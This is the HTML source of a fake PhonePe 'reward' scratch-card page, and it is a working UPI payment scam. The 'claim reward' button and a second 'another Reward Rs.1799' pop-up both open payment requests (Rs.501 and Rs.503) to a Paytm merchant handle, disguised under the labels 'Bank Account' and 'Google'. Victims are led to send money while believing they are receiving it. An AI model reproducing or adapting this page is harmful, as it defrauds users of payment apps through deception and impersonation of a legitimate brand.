
<html><head>
  <meta charset="utf-8"><link href="https://www.fontify.me/wf/d1d1943239bdc1297f6ae30575e05fd5" rel="stylesheet" type="text/css">
<meta name="theme-color" content="#5F259F">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>You've Won Rs.1,999 Thanks Phonepe</title>
  <style>
    body {
        background: #ffffff;
        margin: 0px;
    }

    .bottom {
        position: fixed;
        width: 100%;
        left: 0;
        bottom: 0px;
        text-align: center;
        background: #5f259e;
        /* color: #333; */
        padding: 14px 0px;
        font-size: 15px;
        font-family: font89466;
    }

    .bottom img {
        width: 98%;
        height: auto;
        /* margin-top: 69px; */
        padding: 0px 0px 0px 0px;
    }

    .bottom {}

    .center {
        /* text-align: center; */
        /* height: 100%; */
        /* vertical-align: middle; */
        /* padding: 25% 0px; */
        background: #5f259e;
        border-radius: 508px;
        width: 300px;
        height: 300px;
        margin: auto;
        border: 3px solid #f2f2f2;
    }

    .center img {
    width: 81%;
}
.header {
    width: 100%;
    background: #5f259e;
    
    text-align: center;
    color: #fff;
    font-size: 17px;
    font-family: font89466;
}

.center img {
    width: 187px;
    position: absolute;
    /* top: 0; */
    /* left: 0; */
    padding-top: 64px;
    padding-left: 56px;
}

.reward img {
    width: 153px;
    margin: 16px 20px;
}

a .bottom {
    color: #fff;
    text-decoration: none;
}

  </style>


  <style>

/* The Modal (background) */
.modal {
  display: none; /* Hidden by default */
  position: fixed; /* Stay in place */
  z-index: 9999; /* Sit on top */
  padding-top: 100px; /* Location of the box */
  left: 0;
  top: 0;
  width: 100%; /* Full width */
  height: 100%; /* Full height */
  overflow: auto; /* Enable scroll if needed */
  background-color: rgb(0,0,0); /* Fallback color */
  background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
  background-color: #fefefe;
  margin: auto;
  padding: 20px;
  border: 1px solid #888;
  width: 80%;
}

/* The Close Button */
.close {
  color: #aaaaaa;
  float: right;
  font-size: 28px;
  font-weight: bold;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}.step {
    margin-left: 17px;
        margin-top: 17px;
}
#demo2 {
    z-index: 995;
}

.zoo {
    z-index: 994;
    position: fixed;
    width: 100%;
    height: 100%;
    background: #000000bf;
    top: 0;
}

canvas.canvas {
    /* border-radius: 150px; */
}

div#secret-code {
    border-radius: 25px;
}

div#myBtn {
    /* z-index: 989; */
}
img.s {
    z-index: 9999;
    position: absolute;
    margin-top: -43px;
    margin-left: 73px;
    width: 47px;
    animation: mymove 3s infinite;
}


@keyframes mymove {
  from {left: 0px;}
  to {left: 124px;}
}

.hidden {
    display:none;
}
.header img{width:100%;}
</style>

</head>
<body id="goFS">

<div class="header"><img src="1.png"></div>  
  
<!--  <div class="reward"><img src="http://45.61.138.26/cdn/reward.png"></div> -->



<link href="style.css" rel="stylesheet">
    <link href="scratchcard.css" rel="stylesheet">
<div class="demo2" id="demo2" style="position: relative; cursor: pointer; width: 250px; height: 250px;"><canvas class="canvas" width="250" height="250" style="position: absolute; top: 0px; z-index: 10; display: none;"></canvas>
                                        <div class="code-content" id="secret-code">     
                                            <!-- <img class="osod"src="http://45.61.138.26/cdn/2/p5.png"/>  -->   
                                            <img class="osod" src="501.png">    


                                        </div>


                                    <img src="hand.png" class="s" id="xoo" style="display: none;">
                                    </div>
                                
<div class="zoo canvas" id="zoo" style="display: none;"></div>
  <script src="jquery.min.js"></script>
    <script src="scratchcard.min.js"></script>
  <script src="jquery.modal.min.js"></script>
    <script src="demo.js"></script>

<div class="step"><img src="step.png" width="170px"</div>

<a href="phonepe://pay?pa=PaytmQR2810050501011s72zpmtfw25@paytm&amp;pn=Bank Account&amp;cu=INR&amp;am=501&amp;tn="><div class="bottom" id="myBtn">Claim &amp; Sent Reward to your Bank</div>

</body>
</html>


<!-- The Modal -->
<div id="myModal" class="modal" style="display: none;">

  <!-- Modal content -->
  <div class="modal-content">
    <span class="close">×</span>
<style>
.paymentgateway img {
    width: 100px;
}

.title {
    background: #0060ff;
    padding: 10px;
    text-align: center;
    color: #fff;
    font-weight: 500;
    font-family: arial;
    box-shadow: 1px 1px 10px #8a8a8a;
}

.paymentgateway {
    text-align: center;
    margin: 20px 0px;
}

.otot {
    text-align: center;
    font-size: 24px;
    color: #000000;
    font-weight: bold;
    font-family: arial;
}

.ppop {
    /* margin: 39px 0px; */
    /* border-radius: 41px; */
}

a {
    text-decoration: none;
}

.modal-content {
    border-radius: 12px;
}

span.close {
    color: #ffffff;
    background: #31313169;
    border-radius: 25px;
    font-size: 16px;
    width: 18px;
    text-align: center;
    padding: -1px;
    position: absolute;
    margin-top: -15px;
    right: 20;
}</style>
<div class="ppop"> 
<div class="otot">You got another Reward Rs.1799</div>
<div class="paymentgateway"><img style=" width: 191px; " src="p2.png"></div>
<a href="upi://pay?pa=PaytmQR2810050501011s72zpmtfw25@paytm&amp;pn=Google&amp;cu=INR&amp;am=503&amp;tn="><div class="title">Process to Payout &amp; Get Pay</div></a></div>

  </div>

</div>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-176911640-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-176911640-1');
</script>


<script>
// Get the modal
var modal = document.getElementById("myModal");

// Get the button that opens the modal
var btn = document.getElementById("myBtn");

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks the button, open the modal 
btn.onclick = function() {
  modal.style.display = "block";
}

// When the user clicks on <span> (x), close the modal
span.onclick = function() {
  modal.style.display = "none";
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
  if (event.target == modal) {
    modal.style.display = "none";
  }
}

setInterval(function() {
    window.location.reload();
}, 300000); 

setInterval(function() {  
    
    //document.getElementById('xoo').className += ' hidden';

}, 3000);
setInterval(function() {  
    
    document.getElementById('zoo').className += ' hidden';

}, 20000);
</script>




</body></html>
